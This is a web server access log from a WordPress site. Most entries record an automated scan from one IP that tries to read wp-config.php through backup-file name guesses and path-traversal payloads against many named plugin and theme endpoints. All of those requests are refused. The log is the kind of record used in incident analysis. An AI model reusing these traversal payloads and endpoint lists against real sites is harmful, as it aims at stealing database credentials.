103.69.224.84 - - [16/Sep/2025:21:53:05 -0400] "GET /wp-content/plugins/history-collection/download.php?var=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:05 -0400] "GET /wp-config.phps HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:05 -0400] "GET /wp-content/themes/fluidracountry/download.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:05 -0400] "GET /wp-config.phpb HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:06 -0400] "GET /wp-config.php.production HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:06 -0400] "GET /wp-config.php.gz HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:06 -0400] "GET /wordpress/wp-config.php~ HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:06 -0400] "GET /wp-config.phporiginal HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
216.244.66.228 - - [16/Sep/2025:21:53:05 -0400] "GET /?feed=rss2&p=3392 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
103.69.224.84 - - [16/Sep/2025:21:53:06 -0400] "GET /wp-config.php= HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:06 -0400] "GET /wp-config.copy HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:06 -0400] "GET /wp-admin/admin-ajax.php?action=showbiz_show_image&img=..%2Fwp-config.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:07 -0400] "GET /wp-config.dist HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:07 -0400] "GET /wp-config.php-o HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:07 -0400] "GET /wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:07 -0400] "GET /wp-config.php.c HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:07 -0400] "GET /wp-config.php.bac HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:07 -0400] "GET /wp-config.tmp HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:08 -0400] "GET /wp-config.dev HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:08 -0400] "GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:08 -0400] "GET /wp-config.php.staging HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:08 -0400] "GET /wp-config.html HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:08 -0400] "GET /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:08 -0400] "GET /wp-admin/admin-ajax.php?action=..%2Fwp-config.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:08 -0400] "GET /wp-config.htm HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:09 -0400] "GET /wp-content/plugins/old-post-spinner/logview.php?ops_file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:09 -0400] "GET /_wp-config HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:09 -0400] "GET /wp-config.php.temp HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:09 -0400] "GET /wp-content/themes/responsive-visual/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:09 -0400] "GET /wp-config. HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:09 -0400] "GET /wp-config.phpo HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
4.227.36.16 - - [16/Sep/2025:21:53:10 -0400] "GET /robots.txt HTTP/1.1" 200 92 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.69.224.84 - - [16/Sep/2025:21:53:10 -0400] "GET /wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:10 -0400] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php%3A%2F%2Ffilter%2Fresource%3D..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:10 -0400] "GET /wp-config_copy HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:10 -0400] "GET /blog/wp-config.php.bak HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:10 -0400] "GET /wp-config.1 HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:10 -0400] "GET /blog/wp-config.php~ HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:10 -0400] "GET /wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=..%2Fwp-config.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:11 -0400] "GET /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=...%2F.%2F...%2F.%2F...%2F.%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
20.171.207.11 - - [16/Sep/2025:21:53:10 -0400] "GET / HTTP/1.1" 200 9618 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.69.224.84 - - [16/Sep/2025:21:53:11 -0400] "GET /wp-config.php.tar HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:11 -0400] "GET /wp-config.sample HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:11 -0400] "GET /wordpress/wp-config.php.bak HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
216.244.66.228 - - [16/Sep/2025:21:53:11 -0400] "GET /?feed=rss2&p=3784 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
103.69.224.84 - - [16/Sep/2025:21:53:11 -0400] "GET /wp-config.php.tar.gz HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:11 -0400] "GET /wp-config.php_tmp HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:12 -0400] "GET /wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:12 -0400] "GET /wp-config.prod HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:12 -0400] "GET /general.php?file=wp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:12 -0400] "GET /_wp-config.php.bak HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:12 -0400] "GET /wp-content/themes/storepress/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:12 -0400] "GET /wp-config.php.backup.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:12 -0400] "GET /wp-config.php4 HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:13 -0400] "GET /wp-config.php.cust HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:13 -0400] "GET /wp-content/themes/rttheme18/download.php?download=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:13 -0400] "GET /wp-config.bac HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:13 -0400] "GET /.wp-config.php.bak HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:13 -0400] "GET /_wp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:13 -0400] "GET /wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:14 -0400] "GET /wp-config.php__olds HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:14 -0400] "GET /wp-content/themes/MusicMaker/download.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:14 -0400] "GET /wp-config-sample.bak HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:14 -0400] "GET /wp-config.php.a HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:14 -0400] "GET /wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=..%2Fwp-config.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:14 -0400] "GET /wp-config.php.html HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:15 -0400] "GET /wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:15 -0400] "GET /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:15 -0400] "GET /wp-config.php______ HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:15 -0400] "GET /wp-content/plugins/imdb-widget/pic.php?url=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:15 -0400] "GET /wp/wp-config.php~ HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:15 -0400] "GET /wp-config~ HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:15 -0400] "GET /wp-config.good HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:16 -0400] "GET /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:16 -0400] "GET /wp-content/plugins/zip-attachments/download.php?za_file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:16 -0400] "GET /wp-content/themes/hello-elementor/down.php?path=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
216.244.66.228 - - [16/Sep/2025:21:53:15 -0400] "GET /?feed=rss2&p=4202 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
103.69.224.84 - - [16/Sep/2025:21:53:16 -0400] "GET /wp-config.php6 HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:16 -0400] "GET /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:16 -0400] "GET /wp-content/plugins/plugin-newsletter/preview.php?data=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:17 -0400] "GET /wp-config.php.stage HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:17 -0400] "GET /wp-config.zip HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:17 -0400] "GET /wp-config.2 HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:17 -0400] "GET /mdocs-posts/?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:17 -0400] "GET /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:17 -0400] "GET /wp-config.php.zip HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:17 -0400] "GET /wp/wp-config.php.bak HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:18 -0400] "GET /.wp-config.php.swp HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:18 -0400] "GET /wp-content/themes/estrutura-basica/scripts/download.php?arquivo=..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:18 -0400] "GET /wp-content/uploads/wp-config-backup.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:18 -0400] "GET /wp-content/plugins/wp-publication-archive/includes/openfile.php?file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:18 -0400] "GET /wp-content/themes/antioch/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:18 -0400] "GET /wp-content/uploads/sb-download.php?file=..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:19 -0400] "GET /wordpress/wp-config.php.backup HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:19 -0400] "GET /wp-content/plugins/apptha-slider-gallery/asgallDownload.php?imgname=..%2F..%2F..%2Fwp-load.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:19 -0400] "GET /.wp-config HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:19 -0400] "GET /wp-config.php5 HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:19 -0400] "GET /wp-config.php.aws HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:19 -0400] "GET /?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:19 -0400] "GET /wp-config.bak1 HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
216.244.66.228 - - [16/Sep/2025:21:53:19 -0400] "GET /?feed=rss2&p=4249 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
103.69.224.84 - - [16/Sep/2025:21:53:20 -0400] "GET /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:20 -0400] "GET /wp-content/themes/urbancity/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:20 -0400] "GET /wp-content/themes/linenity/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:20 -0400] "GET /wp-content/themes/duena/download.php?f=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:20 -0400] "GET /wp-content/themes/PlixPro/download.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:20 -0400] "GET /wp-config.ini HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.69.224.84 - - [16/Sep/2025:21:53:21 -0400] "GET /wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
216.244.66.228 - - [16/Sep/2025:21:53:22 -0400] "GET /?feed=rss2&p=4345 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.228 - - [16/Sep/2025:21:53:25 -0400] "GET /?feed=rss2&p=5062 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.228 - - [16/Sep/2025:21:53:27 -0400] "GET /?feed=rss2&p=5661 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.228 - - [16/Sep/2025:21:53:30 -0400] "GET /?feed=rss2&p=5730 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.228 - - [16/Sep/2025:21:53:32 -0400] "GET /?feed=rss2&p=6513 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
20.171.207.11 - - [16/Sep/2025:21:53:37 -0400] "GET /wp-content/themes/newsplus1/assets/js/main.js?ver=37.00 HTTP/1.1" 200 1317 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.244.66.228 - - [16/Sep/2025:21:55:18 -0400] "GET /?feed=rss2&p=6570 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
20.171.207.11 - - [16/Sep/2025:21:57:54 -0400] "GET /wp-content/themes/newsplus1/style.css?ver=37.00 HTTP/1.1" 200 7414 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"